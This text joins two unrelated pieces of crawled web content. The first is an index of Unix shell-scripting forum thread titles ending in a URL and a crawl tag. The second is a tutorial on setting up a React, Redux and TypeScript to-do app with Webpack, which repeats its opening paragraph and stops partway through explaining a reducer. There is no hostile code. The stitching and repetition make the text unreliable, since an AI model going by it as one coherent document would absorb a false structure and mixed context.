- compare/match arrays - awk/sed Command : Parse parameter file / send the lines to the ksh export command - issue in calculation - Parse variable into a command - SED command for read and write to different files - Grep part of the line - Automate shell script - ksh: How to store each output line into a different variable? - script optimization - help need in filtering data - Clear Terminal After Exit - Replacing a pattern in a line - For loop variable to take value linewise, not word-wise - cronjob: Partial script error - help needed in grep and copy - second line of the file - How to Sort files on date field - for i in `cat myname.txt` && for y in `cat yourname.txt` - if [ -f "$variable" ]; then issues, help! - need help with sed command - Question using signals in my own shell.. - if $varib contains non-numeric charctr then... - Capture Schell script error - [Help]RegEx, Putty, Copy Files Insensitive Matching, SSH - Insert Title To Each Lines - foreign characters - Arrays - Can one do a tr within an awk - Gen. Question - Script calls multiple programs - Return Code Handling? - please suggest me a site - help with Korn script - Parsing question. - Getting rid of "Warning: no access to tty.... - How should I add a timeout to my scripts? - Need Help - awk/sed script to read values from parameter files - Append lines with SED - shell translator - awk multidimensional values - Replace characters then read the file without changing it - regarding IFS= - parsing and calculating difference. - Problem with Mailx command to send mail with attachment - Read the directory path - How to extract 3rd line 4th column of a file - KSH Script to Get the <TAG Values> from an XML file - not able to process files - Please let me know - read records from a file - About export - Get coprocess output into var - row count of 60 files in one file - important. select 10 files each time. - filter input & outputs to another file - shopt -s nullglob - How to build a command in a script - Grep MS Word document - Problem with shell script - 1 script or multiple scripts?? - check files, run jobs - Homemade echo command - Folder Lock in Unix - how to cut off last column from the output - Editing a ksh script > Please assist! - Newbie problem with simple script to create a directory - Calculate the time difference between a local file and a remote file. - unix shell script which inserts some records into a file located in remote servers... - Cutting segment of a string - Problem with SCP parellel processing - Script to raise the alarm in the log File - Can we timeout cd command - plz understand my query... - Problem with sed string substitution - Grep yesterday logs from weblogic logs - Print Only second Duplicate entry in the file - Interesting TCL behavior: 007 == 7 is true; 008==8 is false. - Removal of Duplicate Entries from the file - how to convert columns to rows - bash - add backslash in front of variables w/ spaces - Passing a regexp to grep via a shell script - if txtfile has any letters, echo something! - Can you explain me a tclsh file? - need help with script - selective printing of lines - Help with awk printout - how to grep only IP address of e1000g0 using ifconfig -a - removing items from a file with batch - Start a new process when memory/cpu utilisation falls - awk returning "[: ==: unary operator expected" - AWK help for traces in NS2 - Sed question - replace a string with another - Kill a process from a grep - Storing string with space (urgent) - Unix commands in one line - 'df -k .' on remote server - cronjobs stopped working - DISPLAY Script - Editing MSWORD Doc - Multiple instances of the job in shell script. - Repeating groups problem - Shell Script to extract Soft - root password in SH scripts - need help in ftp - Regarding Random Number Genration - check for a file on a remote machine - append string with spaces to a line - file checking - check line by line in a file - count up file - Perl script to invoke Cold Backups - Append value in a file - Create a cronjob - How to validate a column? - find + - assign shell var output of cmd "wc" - Loop - Dynamic calculation - change first word in the every new line - [AWK] read lines with \x00 symbol - help with chmod (files only) - using todays date to create a report using grep - Simple script uploading *.dem files to an ftp - How to Delete string without opening a file - delete strings till specific string - list comparison - How to append copyright to all files? - Need an AWK script to calculate the percentage - Standard output redirection from a variable - for loop - Awk Script for generating a report - Scripts and basics - Find recently updated files in home directory - want to grep only strings in a file? - is is possible remove junk chars from the strings? - how to append the pattern at the end of the line - copy file from script file to remote computer - calculating endless columns - Script for FTP (transfer only new files) - Script to calculate user's last login to check if > 90 days - Get the total of a field in all the lines of a group - Simplfy - Perl Script Issue - Please Help * Thanks!!! - Find files ONLY in current directory - Filtering line out of file - Number of *.txt files which have over n lines? - moving multiple folders/files in subversion using bash script - delete a single space in a line - Filtering symbols from contents - How can i calculate percentage ?? - how to check DB connection in unix shell script - How to parse slash / in sed command.. - AWK - averaging $3 by info in $1 - Running "df -k" on all UNIX platforms - form a line with strings - Finding duplicate lines and deleting folders based on them - can u please confirme the correct - To substitute a string in a line to another string - shell script to read data from text file and to load it into a table in TOAD - take last column includning spaces also - If conditional - Menu Script - comparing files content - Need a script - Is there any better way for sorting in bash/awk - ksh scripting: Extract 1 most recent record for unique key - exit script if user input not four characters - Sorting Windows Directories using Korn script. - Need Help with this Script - shell script in C++ - end of line issue - common UNIX script which is to work in HP and SUN environment - how to do something if grep string is there - problems with a script that outputs data to a file - append a line - Using Sed to read one line only - using variables with sed - egrep parameters - need help in decimel calculation - merging fields from 2 different files. - Deleting files using find command - How to print lines till till a pattern is matched in loop - need loop clarification for the below code - How to remove a cron job interactively? - Scp between two servers - how to insert data into database by reading it from a text file?? - How to display an error msg? - Need help with shell script - use full book for unix - How to insert some constant text at beginig of each line within a text file. - AWK command - Accessing array elements - awk - Split a binary file into 2 basing on 2 delemiter string - Perl Script Syntax error in version 4 - Problem with awk - sed to remove last 2 characters of txt file - Problem with Substring - Check if script run by a user directly or via other scripts - sed to remove 1st two characters every line of text file - how to generate var len strings of a given char - Script to Compare a large number of files. - Need help in awk - calling a function in Shell script troubleshooting - awk -v -- Why doesn't my example work? - How to sca a sequential file and fetch some substring data from it - shell script for primary and standby DB archive log check - Converting a text file to HTML - replaying a record count with another record count - Delete files if they exist - How to awk/sed/grep lines which contains a pattern at a given position - Please correct the code - taking a part from file name - Passing parameter from one file to shell script - VI editor,column postion - AWK to skip comments in XML file - cut problem - Perl Question - getting the line number - difficult nawk to understand - Manipulating a variable across multiple shell scripts - Sed filtering issue - Find a path of a specific file - >> append formatting - Lines with strange characters and sed... - new joine need help - shell script preserving last 2 versions of files - how to scan a sequential file to fetch some of the records? - Test condition - executing shell scripts in a browser - read line in a for loop - add a hyphen every 2 characters of every line - How to scan data directly from Table using a script - sed problem - last line of file deleted - i need books (programming shell) - Remove parenthesis character (Perl) - Error in cron job; - not waiting - Shell commands - diplay user process in separate lines - [ORACLE] CREATE TABLE in bash - Delete a line - substitute commas with pipe - Multiple SQLPLUS background processes not working properly - Separating values from a file and putting to a variable - How to do the date operation ??? - How to get the time cost of functions? - How to delimit a flat file with records with SED - fail a unix script - Help with awk - Split and print - Advanced Search & Delete Text File - How to use SSH to connect to Primary DB and send alert mail - manage function's output - Calculate date by week - Awk help - smart script? - remove directory x seconds after script completes - New to Shell scripting: Can you check it? - Bash script help - removing items with repeated first 3 character - usage of echo with standard input - perl+CGI+mysql !!!!!!! - Find - Awk Multiline Record Combine? - Is it possible with sed or awk? - sorting prob - Increment value (starttime) - I want records in file2 those are not exist in file1 - summarising totals in awk - need help with script - output to file, but complicated - awk help required to group output and print a part of group line and original line - Awk Compare File1 File2 on f2 - simplfy - Regular expressions - Perl - sending an attachment - simple question - extracting domain names out of a text file - awk or perl - awk syntax doubt - trailing 1 value - Insert IP address into MySQL int field - help me with write script shell to do grid-proxy-init - How to remove xml namespace from xml file using shell script? - variable help - time diff help - Break line after last "/" if length > X characters - Send-file /var/log/message - Help me... - awk array - Perl REGEX - Help deleting lines with SED. - Extract Part of a "Word", using AWK or SED???? - ls -l all files created between two times - who - uniq output - Awk Help Needed * Please Help - Redirect grep output to dynamique fileName and subdirectory - need help with creating dynamic tcl displays - query about Attachement in mail - egrep problem - ksh to bash mode - How to check if two variable are empty strings at once? (bash) - Hiding password for FTP in a script - Join command - How can I match lines with just one occurance of a string in awk? - how to compare string & integer in unix - Variable issues - How to search a directory in unix - modifying date (-10 hours) in the content of a file - How to avoid a temp file - find command: various date ranges - Capture all the contents between two attributes - Performance Tuning - CSV Table Filtered/transposed/matched using CSH - File reading problem via shell script - How to print string on screen according the fixed length? - How to concatenate a string and a variable - TO Extract Last 10 Characters from a line - adding the data at a specified location in a file.... - grep problem - Extract XML Element Values - how to get SQLcode - Ping text file of ip addressese and output to text file - How to compare contents of two CSV rows - Use loop in sed or awk? - find command and wrapping in the script - searching for info in paragraph - Get zip path from unzip -l - Can awk do lookups to other files and process results - getopts with repeat of same option - Get the latest added part of a text file? - quick question - To print a specific line in Shell or awk. - GREP with contain output - Read Ms-excel file in unix - Unix File Validation! Help - Renaming multiple files - how to find watermark in a pdf - Exporting CLASSPATH in manifest service file - Please Help required. - Problem in awk - need some clarification on for loop in shel script - Shell Script to replace tokens in multiple files - Loop problem - Shell script using ssh remains connected at primary site - crucial storage issue with ebcdic to ascii converter - Running Sql scripts accross db2 - How to Open Shell Script from X-Manager Console - shell script not connecting to primary from standby site - finding line number if the line contains - Need help with a script - foor loop is not working while assigning to variable - Replace Characters for bunch of Files. - replacing a character with another - Perl + object-oriented programming help - How to remove new line char from a string - script to take row count - Loop through directories for a file - delete record - grep, remove and conconate -- xml files - Need to know if theres "and if" like command - Outputting data from multiple lines - need to insert two columns (or two feilds) at the begining of the table - Need help with a manual task - Using unset to delete array elements - Show if I have new mail in .profile ? - compare data line by line from a file - replacing blank lines - Need help with IF and Grep - help again - search backwards relative to a string - vi question - Compare two files UNMATCH in solaris - Bourne shell script with embedded Sybase SQL - shell script not getting current error messages with time from alert.log - How to split a text after fix character count - How to compare the dates.. - Script Needed Urgent!!!!!!!!! - sed-question delete everthing after a couple of numbers - Extracting regular expression - Deleting a file from REMOTE Unix Server - matrix indexes - moving file to directory in script - Timestamp issue - Running a script for every ftp session - finding in files - algorithm for comparing files - Counting string of a variable - script to compare first column of two files and find difference - HASH(0x775090)= from env - loop and check - To force a script to wait for another. - replace characters in a file - FileWatcher Script - control click variables - textbox and user interaction - To get value from oracle & assign it in UNIX variable - Processes create/join - Convert from CSV to space padded columns (.ksh) - \n not working properly - Need to print only selected char in a string..? - Grab a number at end of filepath - Reading a Parameter File - check processes on remote system? - Running a script in INFINITE LOOP - compare two files for matching in solaris - Another sed question - Shell script process remains after "exit 1" - Extracting specific text from a file - Regular expression with sed - usage of telnet in shell script - How to grep substring from a line ? - Need to convert ksh script to Perl - Pick up the return code for every iteration and display the result only once in loop. - Sum values & compare with footer - create a new file - parse long input parameters - Perl - To print past 5 mins timestamp - report negative value from file - Help Me Please - Help Me Please - How to Rename/Convert Files in Shell Scripting? - FTP Problem - file reading through shell script - Limits of FOR loop to go to end of File - Append Spaces At end of each line Leaving Header and Footer - progress bar - Help Please - how to create auto-answer file - need some help getting started on this script - Can I create a file from the command line - Puzzling Problem: Going back to the previous directory - mailx/mail subject variable with spaces (bash) - Find all files with group read OR group write OR user write permission - Pause for response from the log file - Copying files to the mount point. - Help with scripting APT / dpkg in Debian 4 - Copy files listed in a text file - whitespace problem. - Pass array variabel to awk from shell - Shell/perl script to connect to different servers in single login in teradata - New to forums and had a quick one. - Script to move files based on Pattern don't work - KSH list as function parameter - SFTP through KSH - Inserting lines in between the contents of file. - TCL logging - Inserting a file into another file above a specified location - help with this code - search fields within a file - Delimiter count in a string. - writing into one line - pattern extract - Reading data from a file through shell script - Shell script dynamically case in VAR - double-quote inside double-quote - FTP automation script - How to compare result lpstat with hostsfile - Get string from file after nth symbol - calling a ksh script present in different unix box - How to add text in a file - Read variables contain spaces from text file - hw to insert array values sequentially in a file - Config File with ksh - SCP Exit Codes - get the line number - How to read from a file in unix - finding lines only between a certain string - Find and display largest file on system - error in in running script - syntax error: unexpected end of file - How to Compare two files depend on line length Chars - How to insert and delete any line after desire line - What is wrong with the rsh? - expr error in ksh - File downloading - Help on email data file as excel from unix!! - Shell-script to HP-UX - XML root element - how to run a script when pen drive is inserted - switch user inside a script - comparing sentences - How to make sure a file is uploaded in its entirety - Counting the number of pipes in line - Reading large file, awk and cut - inserting a line after a perticular line - Scripting to convert underscores to spaces - removing the "\" and "\n" character using sed or tr - print disk space warning of 70% - XML Awk : Urgent - copying files from one server to another server - Inserting file into another file at a specified line number - How to pass parameters to an awk file? - how to flip values of two columns and add an extra column - need help in line number of a file - create file in script - How To Neglect Delimiter - shell script to search a string and delete the content - Generate report in HTML file from Oracle DB - How to track exit status of ftp automation - awk to find a formated o/p - delete a string from line - sed command - How to find Duplicate Records in a text file - read files from directory - How to findDuplicate Records in a text file - using sed to get IP-address - Parsing X char from right to left - StdOut to file --> Append Mode - How to grep more than 2 fields? - initialize file to zero - How to find this pattern in a file - capturing the most recent pid from csh - line contains a string write to new file otherwise append - Application for the script - sorting names after doing a find - Ftp scripting question - On how to select the right tool for a given task - Find percent between sum of 2 columns awk help - How to extract text from string using regular expressions - Extracting email address using basename - Need a regex - Using Expect results in a Shell script - problem running shell script (for oracle export) in crontab - perl redirect output to file ..not working - Want to search value and two previous value - using substring in shell script - converting the data type in unix shell script - Print previous, current and next line using sed - How to decrease the font size in Mailx - SSHing from a shell script - delete entry from /etc/hosts file ? - Using awk to read a field - infinite loop to check process is running - intent: df -kh | filter based on capacity (used space) column where % > 85 - Dynamic Log Deletion/Rotatoin Script - How can I add a header to a csv file - SFTP through shellscripts - Redirect within ksh - find command - checking the return code - Set a variable that changes every time? - Shell append or insert - extract lines based on few conditions - joining 2 lines into single one - Help with NAWK regular expressions - while replacing the pattern last line is last - problem in while loop in a script - shell script - line contains a string - having problem with for loop - merge rows based on a common column - Multiple instances of a job. - what are the use of these command - links to all networking commands in linux - kill 0 - shell script which will delete every thing under a directory except a single sub dire - how to use ssh-keygen to login to a UNIX box - formatting lines in a particular fashion - need help in awk - du command error in ksh - last run time of any script - cut columns in everyline - trimm up the decimal places in output - Help assembling script - echo 2 txt files to screen no carraige return - script to archive and purge - Remove matching lines with list of strings - Split line before the pattern - Converting Huge Archive into smaller ones - Redirecting part of output to stdout - Shell script makefile - awk and execute - Counting names - perl arrays - How to delete ctrl key values in a given string? - Edit this rsync for me plz !! - Extract pattern from text line - Patern Match Question on file names - How can I make running gawk scripts more user-friendly in a Windows environment? - How to avoid duplication within 2 files? - fourth field is number in a line - moving a file having blanks in its name - Make script delete certain files - DB2 -txvf explanation.. - Detailed disk usage versus age summary - Please help to debug a small shell script (maybe AWK problem)? - format the extracted data - Bash 'shopt' doubt - How to write a If loop.. - grep problem in perl - parsing aline - error in ksh script - How to compare 2 files. - print certain pattern from 2 lines - How to get the process id - Print the line within the search pattern - need help in grep - How to replace a line in a file with another line from another file!! - Conditional concat lines awk - How to calculate the time difference. - shell script for moving all the file from the same folder - integer expression expected error - FTP files to target Mainframe system - how to grep for a word in a log file.. - shell problem - comparing two strings - php ebooks - Find and replace in a gz file - Unexpected sed result. - script to compare two files of mac address - Accessing php script from shell script - Incorrect output using find command - Weird Interpretation by Awk - parsing a file by line - How to convert the data into excel sheet and send mail using 'mailx' command - copy directory structure to a system on the network - Swapping or switching 2 lines using sed - run awk on one file for each line in a second file - convert unix date to readable format - Unique values from a Terabyte File - Getting Unique values in a file - extract/select pattern from input - How can i copy user permissions(privileges) to a group - Last Command not giving year - ModInverse in perl - cut command - Insert two strings at the beginning and at the end of each line of a file - Help need for automation of su command - Removing end of line to merge multiple lines - Pattern matching problem in PERL script - Using shell to get the last character in a line - Truncating FILE data BASED ON A PATTERN - Database access - copying a file from one dir to another dir - Perl script error - Extract pattern from text line - reading files from diractory one by one - ascii sorting in unix - change line found by pattern using sed - Background-Process with #>/dev/null - Get data from 3 differrnt oracle DB & then compare data - delete a line that does not match the pattern - How to merge multiline into line begining with specific word - How check for a new file on a ftp-server - Differece in '-s' and '-e' - binary to ascii - file editing - select a line that contains the strings - kill a process initiated by crontab - Not access variable outside loop when a reading a file
http://www.unix.com/unix/linux/f-30-p-7.html
crawl-002
refinedweb
6,079
50.33
This tutorial is intended to show how to use the Scrapy framework to quickly write web scrapers. As an example, I will implement a simple scraper to extract comics links and associated alt text and transcripts from xkcd.com. This tutorial assumes that you are comfortable with Python. It also assumes a basic understanding of HTTP and some familiarity with Xpath notation. Installation Scrapy works with Python 2.6 or 2.7. If you're on Windows, you will also have to install OpenSSL. Once you have the pre-requisites, the easiest way to install Scrapy is with pip: - Code: Select all pip install scrapy If this does not work for you, please refer to the installation guide in Scrapy documentation. Concepts Scrapy is a framework, which means that it implements a lot of the "boilerplate" functionality for you, and all you need to do is implement the bits specific to your application. Scrapy breaks these bits down into several categories. For this tutorial, we'll only focus on the following: - Items: these define the data that you want to extract. If you are familiar with ORMs such as Django ORM or sqlalchemy, then Items are equivalent to Models. If you're not familiar with ORMs, you can think of Items as classes that define what comprises a single "data record" that you want to extract. - Spiders: these do the actual crawling and scraping of web pages. They contain the "business logic" for your crawler. Scrapy comes with a couple base implementations that you can subclass. - Link Extractors: these are used to extract links that a spider would use to crawl web sites. Scrapy comes with a couple of built-in extractors that should suffice for the majority of use cases. - Selectors: these are used to extract data from web pages. They parse the contents of the HTTP response into an easily query-able format. If you weren't using Scrapy, you would typically do this with lxml or BeautifulSoup (and in fact, you could just use one of these instead of a selector, if you wanted). Scrapy comes with an excellent Xpath-based selector by default, so we'll stick with that for the tutorial. Project Structure The bits you implement need to be located somewhere Scrapy can find them, so you project must follow the structure that Scrapy expects. Luckily, Scrapy can generate the project directory for you. So let's start by creating a project: - Code: Select all ~/projects$ scrapy startproject xkcd_scraper ~/projects$ tree xkcd_scraper/ xkcd_scraper/ |-- scrapy.cfg |-- xkcd_scraper |-- __init__.py |-- items.py |-- pipelines.py |-- settings.py |-- spiders |-- __init__.py 2 directories, 6 files The top-level project directory contains the Scrapy configuration file scrapy.cfg (which we will not need to worry about in this tutorial) and the Python package with the code for the project (with the same name as the project). Within the package, there are files for defining the various parts of the scraper. In this tutorial, we're only concerned with items and spiders. Writing the Scraper Item First, we need to define what it is that we want to scrape from a web site. We do this by implementing an Item to describe the data inside of xkcd_scraper/xkcd_scraper/items.py. This is as easy as subclassing Item and creating a Field for each individual bit of data we want to scrape: - Code: Select all from scrapy.item import Item, Field class XkcdComicItem(Item): image_url = Field() alt_text = Field() transcript = Field() Here, we're saying that we want to extract the image URL, alt text, and transcript for each xkcd comic. Spider Now let's define how we are going to extract the data by creating a spider inside xkcd_scraper/xkcd_scraper/spiders/__init__.py - Code: Select all from scrapy.contrib.spiders import CrawlSpider, Rule from scrapy.contrib.linkextractors.sgml import SgmlLinkExtractor from scrapy.selector import HtmlXPathSelector from xkcd_scraper.items import XkcdComicItem class XkcdComicSpider(CrawlSpider): name = 'xkcd-comics' start_urls = [''] rules = ( Rule(SgmlLinkExtractor(restrict_xpaths='//a[@rel="next"]'), follow=True, callback='parse_comic'), ) OK, this is a bit more complicated, so let's break it down. - Code: Select all class XkcdComicSpider(CrawlSpider): We're subclassing the CrawlSpider class. A CrawlSpider will start with start with the initial set of URLs and will crawl from there according to a set of rules. - Code: Select all name = 'xkcd-comics' start_urls = [''] rules = ( Rule(SgmlLinkExtractor(restrict_xpaths='//a[@rel="next"]'), follow=True, callback='parse_comic'), ) Here, we're defining the behaviour of the crawler. - The name is used to uniquely identify the crawler, and we'll use it to invoke the crawler later. - start_urls is the list of initial URLs that the spider will start crawling. For this, we're specifying the URL of the first xkcd comic we want to scrape (if we wanted to scrape all comics, we would start with '', but that would take a good while to run). - rules specifies how the crawler will proceed from the initial URLs. Our spider has only one rule -- it will use the built-in link extractor to extract the link to the next comic (the cryptic Xpath just means "find <a> HTML elements with rel attribute set to "next" anywhere in the contents"); it will then invoke the specified callback to process the contents of that URL; finally, with attempt to "follow" that URL, i.e. recursively apply the crawl rules to the contents of that URL). - Code: Select all This is the callback that will get invoked for each page the spider crawls, and this is where the actual scraping happens. All we're doing here is using a selector to find the relevant data in the HTML returned in the HTTP response and populating an instance of the Item we've created earlier with that data. We're using Scrapy's HtmlXPathSelector here, but you could use something like lxml if you are more comfortable with that. OK, that's it. We're done. We now have a fully functioning web scraper. It's time to take it for a spin. Running the Scraper To run the scraper, navigate to the top-level project directory (the one with the scrapy.cfg file) in your favorite shell and run scrapy like so: - Code: Select all ~/projects/xkcd_scraper$ scrapy crawl xkcd-comics -t json -o xkcd-comics.json Here, we're telling scrapy that we want it to crawl using the xkcd-comics spider (the name we've given to our Spider earlier) and we want the output to be formatted as json and to be written to xkcd-comics.json file in the current directory. Once you type that in and hit enter, you'll see a whole bunch of log output (by default, the verbosity level is set to DEBUG) telling you exactly what Scrapy is doing. When all available comics have been scraped, Scrapy will print out a summary and then exit, leaving the json file with the output. One of the cool things about Scrapy is that you can hit CTRL-C at any point to abort the crawling, and you'll always get a well-formatted JSON file with the data that has been scraped so far. Batteries Included This tutorial focused on how to write a web scraper with the minimum amount of fuss. As such, it barely scrapes the functionality available in Scrapy. If there is a demand for it (and if I have the time/motivation), I might cover some of the more advanced features in the future tutorial. For now, here is a subset of the features that are available: - You can use pipelines to process the items once they are extracted, e.g. to clean the data or handle missing items. - You can use signals to hook into any part of the scraping process. - Scrapy provides an easy way of collecting stats about what has been scraped. - Scrapy has a daemon and a web service for managing several scrapers using JSON RPC. - Scrapy comes with a command line tool and an interactive shell. Check out the docs for the full list of features and in-depth guides.
http://python-forum.org/viewtopic.php?f=25&t=1626
CC-MAIN-2014-41
refinedweb
1,346
70.94
The QMainWindow class provides a main application window. More... #include <QMainWindow> Inherits QWidget. The QMainWindow class provides a main application window. QMainWindow provides a main application window, with a menu bar, tool bars, dock widgets and a status bar around a large central widget, such as a text edit, drawing canvas or QWorkspace (for MDI applications). Topics: The saveState() and restoreState() functions provide a means to save and restore the layout of the QToolBars and QDockWidgets in the QMainWindow. These functions work by storing the objectName of each QToolBar and QDockWidget together with information about placement, size, etc. QMainWindow uses separators to separate QDockWidgets from each other and the central widget. These separators let the user control the size of QDockWidgets by dragging the boundary between them. A QDockWidget can be as large or as small as the user wishes, between the minimumSizeHint() (or minimumSize()) and maximumSize() of the QDockWidget. When a QDockWidget reaches its minimum size, space will be taken from other QDockWidgets in the direction of the user's drag, if possible. Once all QDockWidgets have reached their minimum sizes, further dragging does nothing. When a QDockWidget reaches its maximium size, space will be given to other QDockWidgets in the opposite direction of the user's drag, if possible. Once all QDockWidgets have reached their minimum size, futher dragging does nothing. QDockWidget displays a title bar to let the user drag the dock widget to a new location. A QDockWidget can be moved to any location provided enough space is available. (QMainWindow won't resize itself to a larger size in an attempt to provide more space.) A QRubberBand is shown while dragging the QDockWidget. This QRubberBand provides an indication to the user about where the QDockWidget will be placed when the mouse button is released. All un-nested QDockWidgets in the same dock area are considered neighbors. When dragging a QDockWidget over its neighbor: The following diagram depicts this behavior: When dragging nested QDockWidgets, or when dragging to a different dock area, QMainWindow will split the QDockWindow under the mouse. Be aware that the QDockWidget under the mouse will only be split by the QDockWidget being dragged if both can fit in the space currently occupied by the QDockWidget under the mouse. A QDockWidget can be split horizontally or vertically, with the QDockWidget being dragged being placed in one of four possible locations, as shown in the diagram below: The QDockWidget::floatable property influences feedback when the user drags a QDockWidget over the central widget: In either case, dragging the mouse over another QDockWidget causes QMainWindow to choose the other QDockWidget's dock area. When dragging outside the QMainWindow, the QDockWidget::floating property again controls feedback during dragging. When the property is false, dragging outside of the QMainWindow will show the rubberband over the QDockWidget's current location. This indicates that the QDockWidget cannot be moved outside of the QMainWindow. When the QDockWidget::floatable property is true, dragging outside of the QMainWindow will show the QRubberBand under the mouse pointer. This indicates that the QDockWidget will be floating when the mouse button is released. See also QMenuBar, QToolBar, QStatusBar, and QDockWidget.. It behaves essentially like the above function.. It behaves essentially like the above function. Equivalent of calling addToolBar(Qt::TopToolBarArea, toolbar) This is an overloaded member function, provided for convenience. It behaves essentially like the above function.(). This function is called to create a popup menu when the user right-clicks on the menu bar, a toolbar or a dock widget. If you want to create a custom popup menu, reimplement this function and return the created popup menu. Ownership of the popup menu is transferred to the caller. Returns the Qt::DockWidgetArea for dockwidget.(). Removes the dockwidget from the main window. Removes the toolbar from the main window.. Warning: This function should be called at most once for each main window instance status bar for the main window to statusbar. Note:: The Qt::LayoutDirection influences the order of the dock widgets in the two parts of the divided area. When right-to-left layout direction is enabled, the placing of the dock widgets will be reversed. Returns the status bar for the main window. This function creates and returns an empty status bar if the status bar does not exist. See also setStatusBar(). Returns the tool bar area for toolbar. See also addToolBar(), addToolBarBreak(), and Qt::ToolBarArea. This signal is emiited when the style used for tool buttons in the window is changed. The new style is passed in toolButtonStyle. You can connect this signal to other components to help maintain a consistent appearance for your application. See also setToolButtonStyle().
http://doc.trolltech.com/4.0/qmainwindow.html
crawl-001
refinedweb
775
56.05
TypeScript is a typed superset of JavaScript. It has become popular recently in applications due to the benefits it can bring. If you are new to TypeScript it is highly recommended to become familiar with it first before proceeding. TypeScript is a typed superset of JavaScript. It has become popular recently in applications due to the benefits it can bring. If you are new to TypeScript it is highly recommended to become familiar with it first before proceeding. TypeScript is a great language to choose if you are a JavaScript developer and interested in moving towards a statically typed language. Using TypeScript is such a logical move for developers that are comfortable with JavaScript but haven’t written in languages that are statically typed (like C, JVM’s, Go, etc). As I began my journey to TypeScript, (I’m most comfortable with JS, but have written a little bit in Go and C), I found it to be pretty easy to pick up. My initial thought was: “It really isn’t that bad typing all the argument in my function and typing the return value; what’s the fuss all about?” It was nice and simple until we had a project where we needed to create a React/Redux app in TypeScript. It’s super easy to find material for React + JS, but as you begin to search for React + TS and especially React + Redux + TS, the amount of online tutorials (including YouTube videos) begin to dwindle significantly. I found myself scouring Medium, Stack Overflow, etc. for anything I could find to help explain how to set up the project, how types are flowing between files (especially once Redux is involved), and how to build with Webpack. This article is a way for me to solidify my knowledge of React + Redux + TS, and to hopefully provide some guidance for anyone else who is interested in using this tech stack for the front end. TypeScript is becoming more popular, so I hope this is useful to others in the community. Prerequisites: I assume you’re aware of how React, Redux, and Webpack work, and also most concepts in TypeScript (at least interfaces and generics). What are we gonna build? Just to keep it simple, we’ll build the infamous to-do list application. Remember that the purpose is to understand how to set up the project and know how TypeScript integrates with React and Redux. The features that this application will support are: The code for the project can be found here:. For my project, I didn’t use create-react-app --typescript to get the project started. I found that it was a valuable learning experience to get it started from scratch. I’ll go step by step through the import files and folders needed to get this project up and running. Before we start, let me show you what the final structure looks like. TS-Redux-React-Boilerplate ├── build ├── node_modules ├── public │ ├── bundle.js │ └── index.html ├── src │ ├── App.tsx │ ├── index.tsx │ ├── actions │ │ ├── actions.ts │ │ └── index.ts │ ├── components │ │ ├── index.ts │ │ └── TodoItem.tsx │ ├── containers │ │ └── TodoContainer.tsx │ ├── reducers │ │ ├── index.ts │ │ └── todoReducers.ts │ ├── store │ │ └── store.ts │ └── types │ └── types.d.ts ├── .gitignore ├── package-lock.json ├── package.json ├── tslint.json ├── tsconfig.json ├── webpack.config.js └── README.md First, let’s look at the package.json file and install these dependencies using npm i. "dependencies": { "@types/node": "^12.0.0", "@types/react": "^16.8.15", "@types/react-dom": "^16.8.4", "@types/react-redux": "^7.0.8", "react": "^16.8.6", "react-dom": "^16.8.6", "react-redux": "^7.0.3", "redux": "^4.0.1", "ts-loader": "^5.4.5", "typesafe-actions": "^4.2.0", "typescript": "^3.4.5", "webpack": "^4.30.0", "webpack-cli": "^3.3.1" } Let’s first look at the dependencies with the format @types/[npm module here]. If you aren’t familiar with what these modules are, look up. Since most modules are written in JavaScript, they aren’t written with proper type definitions. Once you attempt to import a module without any type information into a project that is all typed, TypeScript will complain. To prevent this, the community of contributors at DefinitelyTyped create high-quality type definition of the most commonly used JavaScript modules so that those modules will integrate as seamlessly as possible with TS. You are probably familiar with the next four. ts-loader is needed because Webpack needs a plugin to parse .ts and .tsx files. (This is similar to babel.) typesafe-actions is a library I use with Redux + TypeScript. Without it, the files can get quite noisy in terms of declaring types for the Store, Reducer, and Actions. This library provides methods that infer type definition for redux code so that the files are a bit cleaner and focused. webpack and webpack-cli are used to bundle the .ts and .tsx files into one .jsfile that can be sent to the front end. Next, let’s look at the tsconfig.json file. The purpose of this file is to configure how you want the ts compiler to run. { "compilerOptions": { "baseUrl": ".", "outDir": "build/dist", "module": "commonjs", "target": "es5", "sourceMap": true, "allowJs": true, "jsx": "react" } } baseUrl denotes the folder. outDir directs the compiler where it should put the compiled code. module tells the compiler which JavaScript module types to use. target tells the compiler which JS version to target. sourceMap tells the compiler to create a bundle.js.map along with bundle.js. Because bundling will turn multiple files into one large .js file, troubleshooting code will be difficult because you wouldn’t easily know which file and at which line the code failed (since everything is just one big file). The .map file will map the bundled file to the respective unbundled file. tslint.json provides options on how strict or loose you want the ts linter to be. The various options you can set for the linter can be found online. Normally when I start projects with Redux, I begin at the action creators. Let’s quickly review the features that we need to implement: Adding an item to a list and removing an item from the list. This means we’ll need two action creators, one for adding and another for removing. import { action } from "typesafe-actions"; // use typescript enum rather than action constants export enum actionTypes { ADD = "ADD", DELETE = "DELETE" } export const todoActions = { add: (item: string) => action(actionTypes.ADD, item), delete: (idx: number) => action(actionTypes.DELETE, idx) }; In the actions.ts file, I’m using the enum feature in TS to create the action constants. Secondly, I’m using the action method provided from the typesafe-actions module. The first argument you pass into the method is a string which represents that action, and the second argument is the payload. The add method will add an item to the list of to-dos, and the deletemethod will remove an item, based on the provided index, from the list of to-dos. In terms of type safety, what we want in our reducers file is the proper type of the payload, given a specific action. The feature in TypeScript that provides this support is called discriminated union *and type guarding*. Consider the example below: // this is an example of discriminated unions // this file isn't used in the project interface ActionAdd { type: "ADD", payload: string } interface ActionDelete { type: "DELETE", payload: number } type Actions = ActionAdd | ActionDelete function reducer(a: Actions) { switch(a.type) { case "ADD" : { // payload is a string } case "DELETE" : { // payload is a number } } } Given the shape of the two action objects, we can discriminate between them based on the type property. Using control flow analysis, like if-else or switch-case statements, it’s very logical that in line 16, the only type that the payload can be is a string. Since we only have two actions, the remaining payload in line 22 will be a number. If you are interested in learning more about discriminated unions and type guarding, I would recommend learning more about it here and here. After defining our action creators, let’s create the reducer for this project. import * as MyTypes from "MyTypes"; import { actionTypes } from "../actions/"; interface ITodoModel { count: number; list: string[]; } export const initialState: ITodoModel = { count: 2, list: ["Do the laundry", "Do the dishes"] }; export const todoReducer = (state: ITodoModel = initialState, action: MyTypes.RootAction) => { switch (action.type) { case actionTypes.ADD: { return { ...state, count: state.count + 1, list: [...state.list, action.payload] }; } case actionTypes.DELETE: { const oldList = [...state.list]; oldList.splice(action.payload, 1); const newList = oldList; return { ...state, count: state.count - 1, list: newList }; } default: return state; } }; In lines four through seven, I’m defining the model (or schema) of our Todostore. It will keep track of how many to-do items we have, as well as the array of strings. Lines nine through 12 are the initial state 